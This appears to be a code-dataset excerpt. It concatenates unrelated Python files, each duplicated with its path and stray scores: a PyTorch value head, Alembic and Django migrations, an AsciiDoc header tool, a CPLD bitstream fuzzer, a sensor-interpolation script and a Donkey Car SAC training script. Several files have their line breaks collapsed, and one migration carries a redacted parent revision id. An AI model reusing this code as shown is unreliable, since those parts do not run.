            self,
            features: tc.Tensor,
            **kwargs: Mapping[str, Any]) -> tc.Tensor:
        """
        Args:
            features (torch.Tensor): Input of shape [batch_size, num_features].
            **kwargs (Mapping[str, Any]): Additional keyword arguments (unused).

        Returns:
            torch.Tensor: Tensor of shape [batch_size] with the estimated
                state-conditional values (trailing singleton dim removed).
        """
        return self._value_head(features).squeeze(-1)
drl/agents/heads/value_heads.py
from typing import Mapping, Any, Type, Callable, Optional

import abc

import torch as tc

from drl.agents.heads.abstract import Head
from drl.agents.architectures.stateless.abstract import HeadEligibleArchitecture


class ValueHead(Head, metaclass=abc.ABCMeta):
    """
    Abstract base class for value-estimation heads.
    """


class SimpleValueHead(ValueHead):
    """
    Value head that wraps a head-eligible architecture emitting one scalar
    value estimate per example.
    """
    def __init__(
            self,
            num_features: int,
            head_architecture_cls: Type[HeadEligibleArchitecture],
            head_architecture_cls_args: Mapping[str, Any],
            w_init: Optional[Callable[[tc.Tensor], None]],
            b_init: Optional[Callable[[tc.Tensor], None]],
            **kwargs: Mapping[str, Any]):
        """
        Args:
            num_features (int): Number of input features.
            head_architecture_cls (Type[HeadEligibleArchitecture]): Architecture
                class used to build the underlying network; must derive from
                HeadEligibleArchitecture.
            head_architecture_cls_args (Mapping[str, Any]): Extra keyword
                arguments forwarded to the architecture constructor.
            w_init (Callable[[torch.Tensor], None]): Weight initializer.
            b_init (Callable[[torch.Tensor], None]): Bias initializer.
            **kwargs (Mapping[str, Any]): Additional keyword arguments (unused).
        """
        super().__init__()
        # Build the underlying network with a single output unit; the
        # extra architecture kwargs are forwarded unchanged.
        network = head_architecture_cls(
            input_dim=num_features,
            output_dim=1,
            w_init=w_init,
            b_init=b_init,
            **head_architecture_cls_args)
        self._value_head = network

    def forward(
            self,
            features: tc.Tensor,
            **kwargs: Mapping[str, Any]) -> tc.Tensor:
        """
        Args:
            features (torch.Tensor): Input of shape [batch_size, num_features].
            **kwargs (Mapping[str, Any]): Additional keyword arguments (unused).

        Returns:
            torch.Tensor: Tensor of shape [batch_size] with the estimated
                state-conditional values (trailing singleton dim removed).
        """
        return self._value_head(features).squeeze(-1)
0.94325
0.326781
revision = '7829789fc19c'
# NOTE(review): down_revision looks like a redaction artifact — restore the
# real parent revision id before running this migration.
down_revision = 'cf<PASSWORD>b<PASSWORD>'
branch_labels = None
depends_on = None

from alembic import op
import sqlalchemy as sa

# Migration: extend the sys_perms enum on permissions_system.permission with
# the new PERMISSION_VIEW global permission.
table_name = 'permissions_system'
column_name = 'permission'
type_name = 'sys_perms'
tmp_type_name = f"tmp_{type_name}"

old_options = ('SUPERUSER', )
new_options = old_options + ('PERMISSION_VIEW', )

new_type = sa.Enum(*new_options, name=type_name)
old_type = sa.Enum(*old_options, name=type_name)


def upgrade():
    """Add PERMISSION_VIEW to the sys_perms enum."""
    ctx = op.get_context()
    dialect = ctx.dialect.name

    if dialect == 'postgresql':
        # PostgreSQL cannot retype an enum column in place: rename the old
        # type out of the way, create the new type, retype the column through
        # text, then drop the old type.
        op.execute(f"ALTER TYPE {type_name} RENAME TO {tmp_type_name}")
        new_type.create(op.get_bind())
        op.execute(f"ALTER TABLE {table_name} ALTER COLUMN {column_name} "
                   f"TYPE {type_name} USING {column_name}::text::{type_name}")
        op.execute(f"DROP TYPE {tmp_type_name}")
    elif dialect == 'sqlite':
        # SQLite emulates ALTER via batch mode (copy-and-swap table).
        with op.batch_alter_table(table_name) as batch_op:
            batch_op.alter_column(
                column_name, existing_type=old_type, type_=new_type)


def downgrade():
    """Remove PERMISSION_VIEW from the sys_perms enum (reverse of upgrade)."""
    ctx = op.get_context()
    dialect = ctx.dialect.name

    if dialect == 'postgresql':
        op.execute(f"ALTER TYPE {type_name} RENAME TO {tmp_type_name}")
        old_type.create(op.get_bind())
        op.execute(f"ALTER TABLE {table_name} ALTER COLUMN {column_name} "
                   f"TYPE {type_name} USING {column_name}::text::{type_name}")
        op.execute(f"DROP TYPE {tmp_type_name}")
    elif dialect == 'sqlite':
        # BUG FIX: the original passed the literal string 'table_name' instead
        # of the table_name variable, so the sqlite downgrade targeted a
        # nonexistent table.
        with op.batch_alter_table(table_name) as batch_op:
            batch_op.alter_column(
                column_name, existing_type=new_type, type_=old_type)
web/server/codechecker_server/migrations/config/versions/7829789fc19c_global_permission_to_get_access_controls.py
revision = '7829789fc19c'
# NOTE(review): down_revision looks like a redaction artifact — restore the
# real parent revision id before running this migration.
down_revision = 'cf<PASSWORD>b<PASSWORD>'
branch_labels = None
depends_on = None

from alembic import op
import sqlalchemy as sa

# Migration: extend the sys_perms enum on permissions_system.permission with
# the new PERMISSION_VIEW global permission.
table_name = 'permissions_system'
column_name = 'permission'
type_name = 'sys_perms'
tmp_type_name = f"tmp_{type_name}"

old_options = ('SUPERUSER', )
new_options = old_options + ('PERMISSION_VIEW', )

new_type = sa.Enum(*new_options, name=type_name)
old_type = sa.Enum(*old_options, name=type_name)


def upgrade():
    """Add PERMISSION_VIEW to the sys_perms enum."""
    ctx = op.get_context()
    dialect = ctx.dialect.name

    if dialect == 'postgresql':
        # PostgreSQL cannot retype an enum column in place: rename the old
        # type out of the way, create the new type, retype the column through
        # text, then drop the old type.
        op.execute(f"ALTER TYPE {type_name} RENAME TO {tmp_type_name}")
        new_type.create(op.get_bind())
        op.execute(f"ALTER TABLE {table_name} ALTER COLUMN {column_name} "
                   f"TYPE {type_name} USING {column_name}::text::{type_name}")
        op.execute(f"DROP TYPE {tmp_type_name}")
    elif dialect == 'sqlite':
        # SQLite emulates ALTER via batch mode (copy-and-swap table).
        with op.batch_alter_table(table_name) as batch_op:
            batch_op.alter_column(
                column_name, existing_type=old_type, type_=new_type)


def downgrade():
    """Remove PERMISSION_VIEW from the sys_perms enum (reverse of upgrade)."""
    ctx = op.get_context()
    dialect = ctx.dialect.name

    if dialect == 'postgresql':
        op.execute(f"ALTER TYPE {type_name} RENAME TO {tmp_type_name}")
        old_type.create(op.get_bind())
        op.execute(f"ALTER TABLE {table_name} ALTER COLUMN {column_name} "
                   f"TYPE {type_name} USING {column_name}::text::{type_name}")
        op.execute(f"DROP TYPE {tmp_type_name}")
    elif dialect == 'sqlite':
        # BUG FIX: the original passed the literal string 'table_name' instead
        # of the table_name variable, so the sqlite downgrade targeted a
        # nonexistent table.
        with op.batch_alter_table(table_name) as batch_op:
            batch_op.alter_column(
                column_name, existing_type=new_type, type_=old_type)
0.425725
0.111096
import os
import re
import argparse
import glob


def slurp_file(path):
    """Read *path* and return its contents; ask the user whether to continue
    if the file is missing, empty, or whitespace-only."""
    data = ''
    try:
        with open(path, 'r') as fin:
            data = fin.read()
    except IOError:
        pass
    if not (data and not data.isspace()):
        assent = input('Warning: ' + path + ' is empty; do you want to continue? [yN]')
        if not assent.lower().startswith('y'):
            exit(1)
    return data


def process_file(std_header, std_footer, path):
    """Replace the standard header/footer sections of one AsciiDoc file.

    The original file is preserved as ``path + '.bak'`` and the rewritten
    content is written back to *path*.
    """
    print("processing", path)
    bak_path = path + '.bak'
    os.rename(path, bak_path)
    with open(bak_path, 'r') as fin, open(path, 'w') as fout:
        data = fin.read()
        # BUG FIX: the replacement text used to be spliced directly into the
        # re.sub template string, so any backslash sequence in the header/
        # footer file (e.g. "\1", "\g<...>", or a lone "\") was interpreted
        # as a regex escape — corrupting output or raising re.error.  Using a
        # replacement *function* inserts the text verbatim.
        def _splice(body):
            return lambda m: m.group(1) + '\n' + body + m.group(2)
        flags = re.IGNORECASE + re.MULTILINE + re.DOTALL
        data = re.sub(r'(//\s*BEGIN STANDARD HEADER).*?(//\s*END STANDARD HEADER)',
                      _splice(std_header), data, flags=flags)
        data = re.sub(r'(//\s*BEGIN STANDARD FOOTER).*?(//\s*END STANDARD FOOTER)',
                      _splice(std_footer), data, flags=flags)
        fout.write(data)


def process_folder(std_header, std_footer, pattern, wd):
    """Process every file under *wd* (recursively) whose name matches *pattern*."""
    wd_realpath = os.path.realpath(wd)
    pattern = os.path.join(wd_realpath, os.path.join('**', pattern))
    for path in glob.glob(pattern, recursive=True):
        process_file(std_header, std_footer, path)


parser = argparse.ArgumentParser(description='Replace standard header/footer sections in AsciiDoc files')
parser.add_argument('-H', '--header', default='std_header.adoc',
                    help='Path to contents of new standard header, default=std_header.adoc')
parser.add_argument('-F', '--footer', default='std_footer.adoc',
                    help='Path to contents of new standard footer, default=std_footer.adoc')
parser.add_argument('-P', '--pattern', default='*.adoc',
                    help='Filename glob pattern, default=*.adoc')
parser.add_argument('workdirs', nargs='*', default=[os.getcwd()],
                    help='Path(s) to folder(s) containing AsciiDoc files, default=.')
args = parser.parse_args()

std_header = slurp_file(args.header)
std_footer = slurp_file(args.footer)
for wd in args.workdirs:
    process_folder(std_header, std_footer, args.pattern, wd)
tools/codegen/update_hdr_ftr_adoc.py
import os
import re
import argparse
import glob


def slurp_file(path):
    """Read *path* and return its contents; ask the user whether to continue
    if the file is missing, empty, or whitespace-only."""
    data = ''
    try:
        with open(path, 'r') as fin:
            data = fin.read()
    except IOError:
        pass
    if not (data and not data.isspace()):
        assent = input('Warning: ' + path + ' is empty; do you want to continue? [yN]')
        if not assent.lower().startswith('y'):
            exit(1)
    return data


def process_file(std_header, std_footer, path):
    """Replace the standard header/footer sections of one AsciiDoc file.

    The original file is preserved as ``path + '.bak'`` and the rewritten
    content is written back to *path*.
    """
    print("processing", path)
    bak_path = path + '.bak'
    os.rename(path, bak_path)
    with open(bak_path, 'r') as fin, open(path, 'w') as fout:
        data = fin.read()
        # BUG FIX: the replacement text used to be spliced directly into the
        # re.sub template string, so any backslash sequence in the header/
        # footer file (e.g. "\1", "\g<...>", or a lone "\") was interpreted
        # as a regex escape — corrupting output or raising re.error.  Using a
        # replacement *function* inserts the text verbatim.
        def _splice(body):
            return lambda m: m.group(1) + '\n' + body + m.group(2)
        flags = re.IGNORECASE + re.MULTILINE + re.DOTALL
        data = re.sub(r'(//\s*BEGIN STANDARD HEADER).*?(//\s*END STANDARD HEADER)',
                      _splice(std_header), data, flags=flags)
        data = re.sub(r'(//\s*BEGIN STANDARD FOOTER).*?(//\s*END STANDARD FOOTER)',
                      _splice(std_footer), data, flags=flags)
        fout.write(data)


def process_folder(std_header, std_footer, pattern, wd):
    """Process every file under *wd* (recursively) whose name matches *pattern*."""
    wd_realpath = os.path.realpath(wd)
    pattern = os.path.join(wd_realpath, os.path.join('**', pattern))
    for path in glob.glob(pattern, recursive=True):
        process_file(std_header, std_footer, path)


parser = argparse.ArgumentParser(description='Replace standard header/footer sections in AsciiDoc files')
parser.add_argument('-H', '--header', default='std_header.adoc',
                    help='Path to contents of new standard header, default=std_header.adoc')
parser.add_argument('-F', '--footer', default='std_footer.adoc',
                    help='Path to contents of new standard footer, default=std_footer.adoc')
parser.add_argument('-P', '--pattern', default='*.adoc',
                    help='Filename glob pattern, default=*.adoc')
parser.add_argument('workdirs', nargs='*', default=[os.getcwd()],
                    help='Path(s) to folder(s) containing AsciiDoc files, default=.')
args = parser.parse_args()

std_header = slurp_file(args.header)
std_footer = slurp_file(args.footer)
for wd in args.workdirs:
    process_folder(std_header, std_footer, args.pattern, wd)
0.234407
0.110807
from util import database, toolchain, bitdiff, progress with database.transact() as db: for device_name, device in db.items(): progress(device_name) package, pinout = next(iter(device['pins'].items())) gclk3_pad = device['specials']['CLK3'] gclr_switch = device['globals']['GCLR'] gclk_switches = {name: switch for name, switch in device['globals'].items() if name.startswith('GCLK')} goe_switches = {name: switch for name, switch in device['globals'].items() if name.startswith('GOE')} all_goe_choices = set() unique_goe_choices = set() for goe_name, goe_switch in goe_switches.items(): for goe_choice in goe_switch['mux']['values']: if goe_choice in unique_goe_choices: unique_goe_choices.remove(goe_choice) elif goe_choice not in all_goe_choices: unique_goe_choices.add(goe_choice) all_goe_choices.add(goe_choice) unique_goe_choices.difference_update({ f"R_PAD", f"C1_PAD", f"C2_PAD", f"{gclk3_pad}_PAD", f"E1_PAD", }) goe_pads = [] for goe_name, goe_switch in goe_switches.items(): for goe_choice in goe_switch['mux']['values']: if not goe_choice.endswith('_PAD'): continue if goe_choice not in unique_goe_choices: continue goe_pads.append(goe_choice) break def run(code, **kwargs): return toolchain.run( f"module top(input GCLR, GCLK1, GCLK2, GCLK3, " f" input GOE1, GOE2, GOE3, GOE4, GOE5, GOE6, " f" output Q); " f"{code} " f"endmodule", { 'GCLR': pinout['R'], 'GCLK1': pinout['C1'], 'GCLK2': pinout['C2'], 'GCLK3': pinout[gclk3_pad], **{ f"GOE{1+n}": pinout[pad[:-4]] for n, pad in enumerate(goe_pads) }, 'Q': pinout[device['macrocells']['MC1']['pad']], }, f"{device_name}-{package}", **kwargs) f_gclr_pos = run(f"DFFAR ff(.CLK(1'b0), .AR(GCLR), .D(1'b0), .Q(Q));") f_gclr_neg = run(f"wire GCLRn; INV in(GCLR, GCLRn); " f"DFFAR ff(.CLK(1'b0), .AR(GCLRn), .D(1'b0), .Q(Q));") gclr_switch.update({ 'invert': bitdiff.describe(1, { 'off': f_gclr_pos, 'on': f_gclr_neg, }), }) for gclk_name, gclk_switch in gclk_switches.items(): f_gclk_pos = run(f"DFF ff(.CLK({gclk_name}), .D(1'b0), .Q(Q));") 
f_gclk_neg = run(f"wire {gclk_name}n; INV in({gclk_name}, {gclk_name}n); " f"DFF ff(.CLK({gclk_name}n), .D(1'b0), .Q(Q));") macrocell = device['macrocells']['MC1'] gclk_mux_option = macrocell['gclk_mux'] gclk_mux_value = 0 for n_fuse, fuse in enumerate(gclk_mux_option['fuses']): gclk_mux_value += f_gclk_pos[fuse] << n_fuse for gclk_mux_net, gclk_mux_net_value in gclk_mux_option['values'].items(): if gclk_mux_value == gclk_mux_net_value: break else: assert False assert gclk_mux_net == gclk_name gclk_switch.update({ 'invert': bitdiff.describe(1, { 'off': f_gclk_pos, 'on': f_gclk_neg, }), }) for (goe_name, goe_switch), goe_pad in zip(goe_switches.items(), goe_pads): f_goe_pos = run(f"TRI t(GCLR, {goe_name}, Q);", strategy={"Global_OE": goe_pad}) f_goe_neg = run(f"wire {goe_name}n; INV in({goe_name}, {goe_name}n); " f"TRI t(GCLR, {goe_name}n, Q);", strategy={"Global_OE": goe_pad}) goe_switch.update({ 'invert': bitdiff.describe(1, { 'off': f_goe_pos, 'on': f_goe_neg, }), })
fuzzers/028-gnet_invert/fuzzer.py
from util import database, toolchain, bitdiff, progress with database.transact() as db: for device_name, device in db.items(): progress(device_name) package, pinout = next(iter(device['pins'].items())) gclk3_pad = device['specials']['CLK3'] gclr_switch = device['globals']['GCLR'] gclk_switches = {name: switch for name, switch in device['globals'].items() if name.startswith('GCLK')} goe_switches = {name: switch for name, switch in device['globals'].items() if name.startswith('GOE')} all_goe_choices = set() unique_goe_choices = set() for goe_name, goe_switch in goe_switches.items(): for goe_choice in goe_switch['mux']['values']: if goe_choice in unique_goe_choices: unique_goe_choices.remove(goe_choice) elif goe_choice not in all_goe_choices: unique_goe_choices.add(goe_choice) all_goe_choices.add(goe_choice) unique_goe_choices.difference_update({ f"R_PAD", f"C1_PAD", f"C2_PAD", f"{gclk3_pad}_PAD", f"E1_PAD", }) goe_pads = [] for goe_name, goe_switch in goe_switches.items(): for goe_choice in goe_switch['mux']['values']: if not goe_choice.endswith('_PAD'): continue if goe_choice not in unique_goe_choices: continue goe_pads.append(goe_choice) break def run(code, **kwargs): return toolchain.run( f"module top(input GCLR, GCLK1, GCLK2, GCLK3, " f" input GOE1, GOE2, GOE3, GOE4, GOE5, GOE6, " f" output Q); " f"{code} " f"endmodule", { 'GCLR': pinout['R'], 'GCLK1': pinout['C1'], 'GCLK2': pinout['C2'], 'GCLK3': pinout[gclk3_pad], **{ f"GOE{1+n}": pinout[pad[:-4]] for n, pad in enumerate(goe_pads) }, 'Q': pinout[device['macrocells']['MC1']['pad']], }, f"{device_name}-{package}", **kwargs) f_gclr_pos = run(f"DFFAR ff(.CLK(1'b0), .AR(GCLR), .D(1'b0), .Q(Q));") f_gclr_neg = run(f"wire GCLRn; INV in(GCLR, GCLRn); " f"DFFAR ff(.CLK(1'b0), .AR(GCLRn), .D(1'b0), .Q(Q));") gclr_switch.update({ 'invert': bitdiff.describe(1, { 'off': f_gclr_pos, 'on': f_gclr_neg, }), }) for gclk_name, gclk_switch in gclk_switches.items(): f_gclk_pos = run(f"DFF ff(.CLK({gclk_name}), .D(1'b0), .Q(Q));") 
f_gclk_neg = run(f"wire {gclk_name}n; INV in({gclk_name}, {gclk_name}n); " f"DFF ff(.CLK({gclk_name}n), .D(1'b0), .Q(Q));") macrocell = device['macrocells']['MC1'] gclk_mux_option = macrocell['gclk_mux'] gclk_mux_value = 0 for n_fuse, fuse in enumerate(gclk_mux_option['fuses']): gclk_mux_value += f_gclk_pos[fuse] << n_fuse for gclk_mux_net, gclk_mux_net_value in gclk_mux_option['values'].items(): if gclk_mux_value == gclk_mux_net_value: break else: assert False assert gclk_mux_net == gclk_name gclk_switch.update({ 'invert': bitdiff.describe(1, { 'off': f_gclk_pos, 'on': f_gclk_neg, }), }) for (goe_name, goe_switch), goe_pad in zip(goe_switches.items(), goe_pads): f_goe_pos = run(f"TRI t(GCLR, {goe_name}, Q);", strategy={"Global_OE": goe_pad}) f_goe_neg = run(f"wire {goe_name}n; INV in({goe_name}, {goe_name}n); " f"TRI t(GCLR, {goe_name}n, Q);", strategy={"Global_OE": goe_pad}) goe_switch.update({ 'invert': bitdiff.describe(1, { 'off': f_goe_pos, 'on': f_goe_neg, }), })
0.316158
0.255657
import pandas as pd import numpy as np import matplotlib.pyplot as plt from scipy.interpolate import CubicSpline import json """ Please download the original bus signals data of each city from a2d2: https://www.a2d2.audi/a2d2/en/download.html the available locations are "Gaimersheim", "Munich" and "Ingolstadt" and save it in the Original_data folder """ # adapt file path to the Original_data folder. file_path = 'Original_data/<location>/bus_signals.json' df = pd.read_json(file_path) print(df) acc_x = np.array(df["acceleration_x"]["values"]) # create an array containing the values of acceleration acc_y = np.array(df["acceleration_y"]["values"]) veh_speed = np.array(df["vehicle_speed"]["values"]) # plotting each sensor separately fig, axes = plt.subplots(22, 1, figsize=(15, 60)) for (col, ax) in zip(df.columns, axes): att = np.array(df[col]["values"]) ax.plot(att[:, 0], att[:, 1]) ax.title.set_text(col) plt.show() # search for the minimum Timestamp TS_min = acc_x[:, 0][0] col_min = "acceleration_x" print("initial TS", TS_min) for (col, ax) in zip(df.columns, axes): att = np.array(df[col]["values"]) x = att[:, 0] for idx in range(len(x)): if x[idx] < TS_min: TS_min = x[idx] # print(col, ax) col_min = col print("minimal TS ", TS_min, " / ", col_min) # search for the maximum Timestamp TS_max = acc_x[:, 0][0] print("initial TS", TS_max) for (col, ax) in zip(df.columns, axes): att = np.array(df[col]["values"]) x = att[:, 0] for idx in range(len(x)): if x[idx] > TS_max: TS = x[idx] TS_max = TS # print(col, ax) col_max = col print("Final TS ", TS, " / ", TS_max, " / ", col_max) # look for the minimum timestamp difference min_sensor = np.array(df[col_min]["values"]) min_TS_diff = min_sensor[1][0] - min_sensor[0][0] Min_column = np.array(df.columns[0]) print(Min_column) for (col, ax) in zip(df.columns, axes): att1 = np.array(df[col]["values"]) for idx in range(len(att1)): x_diff = att1[idx][0] - att1[idx - 1][0] if 0 < x_diff < min_TS_diff: min_TS_diff = x_diff Min_column = 
col print("minimium time difference ", min_TS_diff, " ", "Column", Min_column) # search for the sensor having the min nbr of values Min_S = np.array(df[df.columns[0]]["values"]) Sensor_MIN = df.columns[0] for (col, ax) in zip(df.columns, axes): S = np.array(df[col]["values"]) if len(S) < len(Min_S): Min_S = S Sensor_MIN = col print("minimum sensor", Min_S, " ", Sensor_MIN, " ", len(Min_S)) print("Here is the size of all sensors values") for (col, ax) in zip(df.columns, axes): print(col, " ", len(df[col]["values"])) # #search for the sensor having the max nbr of values Max_S = np.array(df[df.columns[0]]["values"]) Sensor_MAX = df.columns[0] print("initial SensorMax", Sensor_MAX) print(len(df["acceleration_x"]["values"]), " ", len(acc_x[:, 0])) for (col, ax) in zip(df.columns, axes): S = np.array(df[col]["values"]) if len(S) > len(Max_S): print("HEY ", len(S), len(Min_S)) Max_S = S Sensor_MAX = col print("maximum sensor", Max_S, " ", Sensor_MAX, " ", len(Max_S)) # create a new timeline timeline = [TS_min] i = 0 while timeline[i] < TS_max: timeline.append(timeline[i] + min_TS_diff) i = i + 1 timeline[len(timeline) - 1] = TS_max # writing interpolated data in a json file new_data_dict = dict() with open('Interpolated_data/data_Ingolstadt.json', 'w') as f: for (col, ax) in zip(df.columns, axes): data_list = list() att = np.array(df[col]["values"]) x = att[:, 0] y = att[:, 1] cs = CubicSpline(x, y) y_new = cs(timeline) for i in range(len(y_new)): data_list.append([int(timeline[i]), y_new[i]]) new_data_dict[col] = ({'unit': df[col]["unit"], 'values': data_list}) json.dump(new_data_dict, f, sort_keys=True, indent=4)
Clustering_approach/Data_interpolation.py
import pandas as pd import numpy as np import matplotlib.pyplot as plt from scipy.interpolate import CubicSpline import json """ Please download the original bus signals data of each city from a2d2: https://www.a2d2.audi/a2d2/en/download.html the available locations are "Gaimersheim", "Munich" and "Ingolstadt" and save it in the Original_data folder """ # adapt file path to the Original_data folder. file_path = 'Original_data/<location>/bus_signals.json' df = pd.read_json(file_path) print(df) acc_x = np.array(df["acceleration_x"]["values"]) # create an array containing the values of acceleration acc_y = np.array(df["acceleration_y"]["values"]) veh_speed = np.array(df["vehicle_speed"]["values"]) # plotting each sensor separately fig, axes = plt.subplots(22, 1, figsize=(15, 60)) for (col, ax) in zip(df.columns, axes): att = np.array(df[col]["values"]) ax.plot(att[:, 0], att[:, 1]) ax.title.set_text(col) plt.show() # search for the minimum Timestamp TS_min = acc_x[:, 0][0] col_min = "acceleration_x" print("initial TS", TS_min) for (col, ax) in zip(df.columns, axes): att = np.array(df[col]["values"]) x = att[:, 0] for idx in range(len(x)): if x[idx] < TS_min: TS_min = x[idx] # print(col, ax) col_min = col print("minimal TS ", TS_min, " / ", col_min) # search for the maximum Timestamp TS_max = acc_x[:, 0][0] print("initial TS", TS_max) for (col, ax) in zip(df.columns, axes): att = np.array(df[col]["values"]) x = att[:, 0] for idx in range(len(x)): if x[idx] > TS_max: TS = x[idx] TS_max = TS # print(col, ax) col_max = col print("Final TS ", TS, " / ", TS_max, " / ", col_max) # look for the minimum timestamp difference min_sensor = np.array(df[col_min]["values"]) min_TS_diff = min_sensor[1][0] - min_sensor[0][0] Min_column = np.array(df.columns[0]) print(Min_column) for (col, ax) in zip(df.columns, axes): att1 = np.array(df[col]["values"]) for idx in range(len(att1)): x_diff = att1[idx][0] - att1[idx - 1][0] if 0 < x_diff < min_TS_diff: min_TS_diff = x_diff Min_column = 
col print("minimium time difference ", min_TS_diff, " ", "Column", Min_column) # search for the sensor having the min nbr of values Min_S = np.array(df[df.columns[0]]["values"]) Sensor_MIN = df.columns[0] for (col, ax) in zip(df.columns, axes): S = np.array(df[col]["values"]) if len(S) < len(Min_S): Min_S = S Sensor_MIN = col print("minimum sensor", Min_S, " ", Sensor_MIN, " ", len(Min_S)) print("Here is the size of all sensors values") for (col, ax) in zip(df.columns, axes): print(col, " ", len(df[col]["values"])) # #search for the sensor having the max nbr of values Max_S = np.array(df[df.columns[0]]["values"]) Sensor_MAX = df.columns[0] print("initial SensorMax", Sensor_MAX) print(len(df["acceleration_x"]["values"]), " ", len(acc_x[:, 0])) for (col, ax) in zip(df.columns, axes): S = np.array(df[col]["values"]) if len(S) > len(Max_S): print("HEY ", len(S), len(Min_S)) Max_S = S Sensor_MAX = col print("maximum sensor", Max_S, " ", Sensor_MAX, " ", len(Max_S)) # create a new timeline timeline = [TS_min] i = 0 while timeline[i] < TS_max: timeline.append(timeline[i] + min_TS_diff) i = i + 1 timeline[len(timeline) - 1] = TS_max # writing interpolated data in a json file new_data_dict = dict() with open('Interpolated_data/data_Ingolstadt.json', 'w') as f: for (col, ax) in zip(df.columns, axes): data_list = list() att = np.array(df[col]["values"]) x = att[:, 0] y = att[:, 1] cs = CubicSpline(x, y) y_new = cs(timeline) for i in range(len(y_new)): data_list.append([int(timeline[i]), y_new[i]]) new_data_dict[col] = ({'unit': df[col]["unit"], 'values': data_list}) json.dump(new_data_dict, f, sort_keys=True, indent=4)
0.28897
0.577019
import argparse as arp import os import numpy as np from reinforcement_learning import logger from reinforcement_learning.gym.envs.donkey_car.donkey_env import DonkeyEnv from reinforcement_learning.common.callbacks import CheckpointCallback from reinforcement_learning.common.vec_env.subproc_vec_env import SubprocVecEnv from reinforcement_learning.sac.policies import MlpPolicy, CnnPolicy from reinforcement_learning.sac.sac import SAC as sac from on_policy_experiments import generate_traj, find_checkpoint_with_highest_explained_variance def make_env(env_class, *args): fn = lambda: env_class(*args) return fn if __name__ == '__main__': parser = arp.ArgumentParser(description='Test state-of-art RL alghorithms in OpenAI gym') parser.add_argument('-e', '--env', help='Environment index', type=int, default=1) parser.add_argument('-s', '--steps', help='Number of episode steps', type=int, default=256) parser.add_argument('-u', '--updates', help='Number of updates', type=int, default=10000) parser.add_argument('-a', '--algorithm', help='RL algorithm index', type=int, default=0) parser.add_argument('-o', '--output', help='Output directory', default='models') parser.add_argument('-c', '--cuda', help='Use CUDA', default=False, type=bool) parser.add_argument('-t', '--trainer', help='Expert model', default='SAC/MlpPolicy_expert') args = parser.parse_args() if not args.cuda: os.environ["CUDA_VISIBLE_DEVICES"] = "-1" env_class = DonkeyEnv conf = {'exe_path': '/home/mizolotu/DonkeyCar/donkey_sim.x86_64', 'port': 9091} level = 'generated_track' algorithm = sac policy = [CnnPolicy, MlpPolicy][args.env] totalsteps = args.steps * args.updates env_fns = [make_env(env_class, level, conf, args.env)] env = SubprocVecEnv(env_fns) logdir = f'{args.output}/{env_class.__name__}_{args.env}/{algorithm.__name__}/{policy.__name__}/' format_strs = os.getenv('', 'stdout,log,csv').split(',') logger.configure(os.path.abspath(logdir), format_strs) model = algorithm(policy, env, n_steps=args.steps, 
verbose=1) cb = CheckpointCallback(args.steps, logdir, verbose=1) model.learn(total_timesteps=totalsteps, callback=cb)
train_expert_donkey.py
import argparse as arp import os import numpy as np from reinforcement_learning import logger from reinforcement_learning.gym.envs.donkey_car.donkey_env import DonkeyEnv from reinforcement_learning.common.callbacks import CheckpointCallback from reinforcement_learning.common.vec_env.subproc_vec_env import SubprocVecEnv from reinforcement_learning.sac.policies import MlpPolicy, CnnPolicy from reinforcement_learning.sac.sac import SAC as sac from on_policy_experiments import generate_traj, find_checkpoint_with_highest_explained_variance def make_env(env_class, *args): fn = lambda: env_class(*args) return fn if __name__ == '__main__': parser = arp.ArgumentParser(description='Test state-of-art RL alghorithms in OpenAI gym') parser.add_argument('-e', '--env', help='Environment index', type=int, default=1) parser.add_argument('-s', '--steps', help='Number of episode steps', type=int, default=256) parser.add_argument('-u', '--updates', help='Number of updates', type=int, default=10000) parser.add_argument('-a', '--algorithm', help='RL algorithm index', type=int, default=0) parser.add_argument('-o', '--output', help='Output directory', default='models') parser.add_argument('-c', '--cuda', help='Use CUDA', default=False, type=bool) parser.add_argument('-t', '--trainer', help='Expert model', default='SAC/MlpPolicy_expert') args = parser.parse_args() if not args.cuda: os.environ["CUDA_VISIBLE_DEVICES"] = "-1" env_class = DonkeyEnv conf = {'exe_path': '/home/mizolotu/DonkeyCar/donkey_sim.x86_64', 'port': 9091} level = 'generated_track' algorithm = sac policy = [CnnPolicy, MlpPolicy][args.env] totalsteps = args.steps * args.updates env_fns = [make_env(env_class, level, conf, args.env)] env = SubprocVecEnv(env_fns) logdir = f'{args.output}/{env_class.__name__}_{args.env}/{algorithm.__name__}/{policy.__name__}/' format_strs = os.getenv('', 'stdout,log,csv').split(',') logger.configure(os.path.abspath(logdir), format_strs) model = algorithm(policy, env, n_steps=args.steps, 
verbose=1) cb = CheckpointCallback(args.steps, logdir, verbose=1) model.learn(total_timesteps=totalsteps, callback=cb)
0.452536
0.200323
from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='MenuDetail', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('type_name', models.TextField(verbose_name='Menu Type')), ('category', models.TextField(verbose_name='Category')), ('created', models.DateTimeField(auto_now_add=True, verbose_name='created')), ('modified', models.DateTimeField(auto_now=True, verbose_name='modified')), ], options={ 'verbose_name': 'MenuType', 'verbose_name_plural': 'MenuTypes', }, ), migrations.CreateModel( name='Table', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.TextField(verbose_name='Table')), ('capacity', models.IntegerField(verbose_name='Capacity')), ('created', models.DateTimeField(auto_now_add=True, verbose_name='created')), ('modified', models.DateTimeField(auto_now=True, verbose_name='modified')), ], options={ 'verbose_name': 'Table', 'verbose_name_plural': 'Tables', }, ), migrations.CreateModel( name='Menu', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.TextField(verbose_name='Menu name')), ('quanitity', models.TextField(verbose_name='Quanitity')), ('price', models.DecimalField(decimal_places=2, max_digits=5, verbose_name='Price')), ('description', models.TextField(verbose_name='Description')), ('taste', models.TextField(verbose_name='Taste')), ('created', models.DateTimeField(auto_now_add=True, verbose_name='created')), ('modified', models.DateTimeField(auto_now=True, verbose_name='modified')), ('type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.MenuDetail', verbose_name='Type')), ], options={ 'verbose_name': 'Menu', 'verbose_name_plural': 'Menu', }, ), ]
core/migrations/0001_initial.py
